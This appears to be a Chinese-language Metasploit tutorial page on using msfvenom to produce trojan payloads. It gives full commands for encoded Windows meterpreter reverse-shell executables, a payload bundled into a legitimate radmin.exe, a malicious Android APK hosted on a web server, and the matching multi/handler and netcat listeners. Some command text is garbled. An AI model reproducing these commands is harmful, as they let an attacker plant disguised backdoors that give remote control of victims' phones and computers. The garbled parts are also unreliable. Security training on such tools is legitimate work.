Metasploit进阶第四讲 生成Android  apk文件

01  msfvenom基本参数

msfvenom介绍

承接上回,staged/unstage payload如何利用?

msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。

msfvenom基本参数

msfvenom  -h

-p        ->指定payload

-1        ->列出所有可用项

-f         ->指定文件输出格式

-e        ->指定编码格式

-a        ->选择架构平台

-o        ->选择文件输出路径,包含文件名

-s         ->指定生成的payload最大大小

-b        ->避免使用的字符

-I         ->指定编码次数

-c         ->添加自己的shellcode

-xxxx.exc   -k    ->捆绑文件到xxx.cxc

以下使用msfvenom分别是什么意思?

Msfvenom   -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-b ‘\×00xff' –I 3 –f exe -o abc.exe

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe

msfvenom生成apk文件

staged payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545

R>/var/www/html/Lliang.apk

metasploit:

use exploit/multi/handler                  加载模块

set payload android/meterpreter/reverse_tcp      选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

unstage payload:

 

msfvenom  –p  windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545

-f exe –o /var/www/html/shell-stageless.exe

metasploit:

use exploit/multi/handler加载模块

set payload windows/shell_reverse_tcp 选择Payload

unstage payload:

msfvenom  -p  windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545     -f exe  -o  /var/www/html/shell-stageless.exe

 netcat:在两台电脑之润建立链接并返回两个数据流

nc  -lyp  4545    -监听4545端口

-v/-vw   显示指令执行过程

-l  使用监听模式,管控传入的资料

-p   设置本地主机使用的通信端口

staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload

6.Metasploit生成apk攻击Android实例的更多相关文章

  1. Kali之Metasploit生成apk后门控制安卓

    扫盲教程,大佬勿喷. 实验中请更改为你环境的IP. 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali ...

  2. MyEclipse 生成APK文件

    MyEclipse 生成APK文件 Android Tools>Export  Signed  Application Packages. http://jingyan.baidu.com/ar ...

  3. eclipse将android项目生成apk并且给apk签名

    转载:http://www.cnblogs.com/tianguook/archive/2012/09/27/2705724.html 生成apk最懒惰的方法是:只要你运行过android项目,到工作 ...

  4. Android 手机卫士--打包生成apk维护到服务器

    项目打包生成apk过程: 1.生成签名文件,并且指定所在位置 2.使用生成的签名文件,给工程打包生成一个apk 本文地址:http://www.cnblogs.com/wuyudong/p/59033 ...

  5. eclipse下Android无法自动生成apk文件怎么办?

    eclipse下Android无法自动生成apk文件怎么办? 现象:创建android工程后,通过手动build/clean或自动build均无法在bin文件夹下生成.apk文件 解决方法:进入win ...

  6. linux(以ubuntu为例)下Android利用ant自动编译、修改配置文件、批量多渠道,打包生成apk文件

    原创,转载请注明:http://www.cnblogs.com/ycxyyzw/p/4555328.html  之前写过一篇<windows下Android利用ant自动编译.修改配置文件.批量 ...

  7. windows下Android利用ant自动编译、修改配置文件、批量多渠道,打包生成apk文件

    原创文章,转载请注明:http://www.cnblogs.com/ycxyyzw/p/4535459.html android 程序打包成apk,如果在是命令行方式,一般都要经过如下步骤: 1.用a ...

  8. Android实例-实现扫描二维码并生成二维码(XE8+小米5)

    相关资料: 第三方资料太大没法写在博文上,请下载CSDN的程序包. 程序包下载: http://download.csdn.net/detail/zhujianqiangqq/9657186 注意事项 ...

  9. Android 命令行编译、打包生成apk文件

    一.搭建搭建环境 1. 安装JDK 和 Android SDK   2. 配置环境变量 D:\android-sdk-windows\tools C:\Program Files\Java\jdk1. ...

随机推荐

  1. Java Opencv 实现锐化

    § Laplacian() void cv::Laplacian    (    InputArray     src,                                       O ...

  2. php通过单例模式使一个类只能创建一个对象。

    单例模式也就是一个类只能创建出一个对象 首先你要知道它的基本思想为:三私一公! 何为三私一公?   1(私).防止用户通过构造方法创建对象,因此私有化构造方法. 2(公).创建一个公共静态函数用来进入 ...

  3. 大型Java进阶专题(四) 设计模式之工厂模式

    前言 ​ 今天开始我们专题的第三课了,开始对设计模式进行讲解,本章节介绍:了解设计模式的由来,介绍设计模式能帮我们解决那些问题以及剖析工厂模式的历史由来及应用场景.本章节参考资料书籍<Sprin ...

  4. 初学react

    React特点: 声明式设计:建议使用JSX来描述用户界面;构建组件:单向响应的数据流: JSX:JSX是一种JAVASCRIPT的语法扩展,元素是构成react的最小单位,JSX就是用来声明REAC ...

  5. ui自动化chrome文件上传操作

    web自动化,再chrome浏览器中文件上传操作

  6. 利用java编写物品的品牌、尺寸、价格、库存(新手)

    //定义一个类 public class NV{ //公共静态的主方法 public static void main(String[] args){ //打印 “京东三九女神节” 标题 System ...

  7. Linux学习第六天

    学习Linux环境下的挂载命令. 什么是挂载命令? 1.Windows下,mount挂载,就是给磁盘分区提供一个盘符(C,D,E,...).比如插入U盘后系统自动分配给了它I:盘符其实就是挂载,退优盘 ...

  8. Oracle job启动与关闭

    --查看job下次执行时间以及间隔时间 select * from dba_jobs where job = '774'; --启动job exec dbms_job.run(774); --停用jo ...

  9. SpringMVC最详细笔记partⅠ

    一.springMVC-quickStar 解决maven加载项目过慢 archetypeCatalog internal 导入依赖 <!-- 版本锁定 --> <propertie ...

  10. Prism 源码解读2-View的加载和控制

    介绍 上一篇介绍了Region,这一篇跟Region息息相关,讲一下Region中View的加载方式及控制. 4.ViewDiscovery 在创建好Region后需要将View添加到Region中. ...